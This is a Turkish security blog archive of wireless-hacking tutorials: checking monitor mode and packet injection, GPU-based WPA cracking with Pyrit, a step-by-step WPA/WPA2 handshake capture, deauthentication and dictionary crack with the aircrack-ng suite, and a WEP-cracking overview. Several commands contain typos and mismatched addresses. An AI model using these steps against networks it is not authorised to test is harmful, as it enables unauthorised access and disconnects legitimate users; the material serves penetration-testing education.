Archive for the ‘ Wireless ’ Category

Wireless Kartım Packet Injection Destekliyor mu ?

 

Kablosuz ağlara yönelik saldırılarda, kullanılan wireless kartının monitor mod ve packet injection desteklemesi gerekir.

Monitor Mod: Çekim alanındaki kablosuz ağları monitor etmeyi ve ürettikleri trafikleri izlemeyi sağlar.
Packet Injection: Hedef kablosuz ağa dahil olmadan (herhangib bir kimlik doğrulama yapmadan) doğrudan o ağa paket sokuşturmayı sağlar.Kablosuz ağa bağlı istemcileri ağdan düşürmek, wireless kırma işlemini hızlandırmak için packet üretimini arttırmak vb. saldırılar gerçekleştirilir.

Ağ kartını monitor moda almak için;

# airmon-ng start wlan0

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
823 NetworkManager
825 avahi-daemon
826 avahi-daemon
962 wpa_supplicant
1214 dhclient
Process with PID 1214 (dhclient) is running on interface wlan0

Interface Chipset Driver

wlan0 Atheros ath9k – [phy0]
(monitor mode enabled on mon0) Read more

WPA/WPA2 Kırmak İçin Ekran Kartınızı Kullanın

Pyrit WPA/WPA2-PSK parolalarını kırmak için geliştirilmekte olan bir yazılımdır. En önemli özelliği CPU’ya ek olarak Nvdia ve Ati ekran kartlarının grafik işlemcilerini kullanarak parola kırma işlemi yapmasıdır. Özellikle yeni nesil gelişmiş ekran kartlarıyla oldukça iyi performans verebilir.

Pyri

Read more

Kablosuz Ağları Kırmak ve Kablosuz Ağ Güvenliği 2 – WPA Crack

Kablosuz ağların güvenliği ve kırılması ile ilgili bir önceki yazımızda kablosuz ağ şifreleme algoritması olan WEP güvenliğine ve kırılmasına değinmiştik.Bu eğitim videosunu sitemizden online olarak izleyebildiğiniz gibi http://www.4shared.com/file/96X1unbu/wireless-hacking.html adresinden indirebilirsinizde. Şu ana kadar toplamda 2,530 ~ defa indirilmesi ve bu konuda aldığım mailler konunun hassasiyetini ortaya koyuyor : ))

Konunun devamı niteliğinde olan bu yazıda WPA/WPA2 paylaşımlı anahtarını kullanan networklerin nasıl kırılabileceğini uygulamalı olarak bulabilirsiniz.

Bazı terimler ve değerleri ;
Hedef ağa bağlı istemcinin MAC adresi : 00:1E:4C:43:A6:3E
BSSID (Access Point Cihazının MAC Adresi ) : 00:73:07:38:94:C7
ESSID (Kablosuz ağın ismi) : EVEREST
Access point kanal numarası : 11
Kablosuz ağ arabimi : wlan1

Basit haliyle saldırı adımları ;

  1. Kablosuz ağ arabirimi access pointin yayın yaptığı kanal için monitor moda alınır
  2. airodump-ng ile access point’in bulunduğu kanalı dinleyip authentication handshake paketlerini yakalamaya başlanır
  3. Wireless istemcisine aireplay-ng ile deuthentication paketleri göndererek wireless ağdan düşürülüp, tekrar bağlanması sağlanır
  4. aircrack-ng yazılımı çalıştırılarak authentication handshake paketlerinden paylaşımlı anahtar elde edilmeye çalışılır.

ADIM 1 : Wireless ağ arabirimini monitor moda almak
airmon-ng start wlan1 11

airmon-ng start wlan1 11 monitor mode

Adım 2 : airdump-ng ile auth. handshake paketlerinin yakalanması

Çevrede yayın yapan kablosuz ağları tespit etmek için ;
airodump-ng –channel 11 –encyrpt wpa wlan1

airodump-ng --encrypte wpa wlan1

11. kanalda wpa şifrelemesi ile yayın yapan EVEREST kablosuz ağını dinlemeye alıyoruz ;
airodump-ng –channel 11 –encyrpt wpa –bssid 00:14:6C:7E:40:80 -w lol wlan1

  • –channel parametresi ile kanal (channel) numarası belirtilir
  • –encyrpt parametresi ile şifreleme algoritması (wpa)  belirtilir
  • –bssid hedef Access Point’in mac adresi
  • -w ile yakalanan paketlerin yazılacağı dosya ismi

airodump-ng --channel 11 --encyrpt wpa --bssid 00:14:6C:7E:40:80 -w lol wlan1

Adım 3 : aireplay-ng ile wireless istemcisini kimlikdoğrulamaya zorlamak

Bu işlem opsiyoneldir, isterseniz bir istemcinin kablosuz ağa dahil olup handshake paketlerini yakalamayı bekleyebilirsiniz veya deauth. paketleri gönderip kablosuz ağa bağlı istemciniyi düşürüp tekrar bağlanmasını sağlayabilirsiniz böylelikle zaman kaybetmeden istiyacımız olan handshake paketini yakalamış oluruz. Detaylar burada = http://www.aircrack-ng.org/doku.php?id=deauthentication

aireplay-ng -0 5  -a 00:73:07:38:94:C7 -c 00:1E4C:43:A6:3E wlan1

  • -0  deauthentication paketi hazırlar
  • 5 toplam paket sayısı
  • -a Access point’in mac adresi
  • -c İstemcinin mac adresi
  • wlan1 kullanılacak ağ arabirimi

aireplay-ng -0 5  -a 00:73:07:38:94:C7 -c 00:1E4C:43:A6:3E wlan1

Bu adımı gerçekleştirdikden hemen sonra, deauth. saldırısı başarılımı ve  handshake yakalamışmıyız bakmak için airodump-ng ekranına geçiş yapabiliriz

airodump-ng handshake

Deuthentication ve Authentication paketlerinin detaylarını merak ediyorsanız, bu işlem sırasında wireshark ile paket analizi yapabilirsiniz.

wireshark deauthentication packages

wireshark wireless authentication packages

Adım 4:  airecrack-ng ile paylaşımlı anahtarın kırılması

Yakaladığımız paketlerden paylaşımlı anahtarı kırmak için geniş bir parola veritabanımız/sözlüğümüz olmalı. Eğer hedef sistemin parolası bizim sözlüğümüzde yoksa parolayı elde etmek bir ömür sürebilir.Bu için bakınız. “parola kırma teknikleri”

airecrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -c lol-o1.cap

  • -w wordlist/sözlük/parola veritabanının yolunu belirtir
  • -c .cap dosyasının yolunu belirtir

airecrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -c lol-o1.cap

Mutlu son : ))

Kablosuz Ağları Kırmak ve Kablosuz Ağ Güvenliği – WEP Crack

Wireless Hacking
Wireless network teknolojisi gittikçe popülerleşmekte fakat aynı zamanda güvenlik açıkları ortaya çıkmaktadır.Wireless teknolojisi iki özelliğiyle popülerleşmektedir, rahat olması ve ücretler ile.

Kablosuz lan teknolojisi çalışanların dijital kaynaklara masalarına bağlı kalmadan ulaşmalarını sağlamaktadır.
Laptoplar toplantılara götürülebilir , yada cafelerden wireless networklere dahil olabilir.

İş ve wireless saldırıları
Firmalar wireless networklere talep gösterdikçe wireles networklerin güvenlikleri derinleşmiştir.
İşler fiziksel girişe gerek duymayan hackerlar yüzünden , ücretsiz edinilebilen araçlar sayesinde yüksek tehlike altındadırlar.
Warchalking, Wardriving, Warflying hackerların networklere ulaşmada kullandığı yöntemler arasındadır.

Terminoloji :
Warhalking : Etrafta dolaşıp Wireless networkleri araştırmak .
Wardriving : Araba ile dolaşıp Wireless networkleri araştırmak
WarFlying : Uçarak Wireless networkleri araştırmak. (Uçark , helikopter gibi)
WarChalking : Açık networkleri tebeşirle işaretlemek.(Duvara,direğe, ota çöpe işaretlemek)
Blue jacking : Bluetooth kullanarak cep telefonlarını hacklemek.
Global Positioning System (GPS) : Bulunan networklerin yerini öğrenmek için kullanılır.

Kablosuz ağlarda güvenlik seçeneklerinin bazıları;
-Open Security
-WEP
-WPA
-Wireless Gateway
-RADIUS / WPA-RADIUS
-RSN
-Özel Çözümler (Cihazlara özel güvenlik ayarları,Sertifikalı kimlik doğrulama vs.)

Örnek bir saldırı;

Wep ile şifrelenmiş wireless networkün kırılması videosunu tam ekran izlemek için ;
http://cehturkiye.com//wireless-hacking/wep-cracking.html

Videoyu bilgisayarınıza indirmek için ;
http://www.4shared.com/file/80006826/72325013/wireless-hacking.html adresine gidebilirsiniz.

Korunmak için, size uygun çözümü seçin :)

 
Hosting Sponsorumuz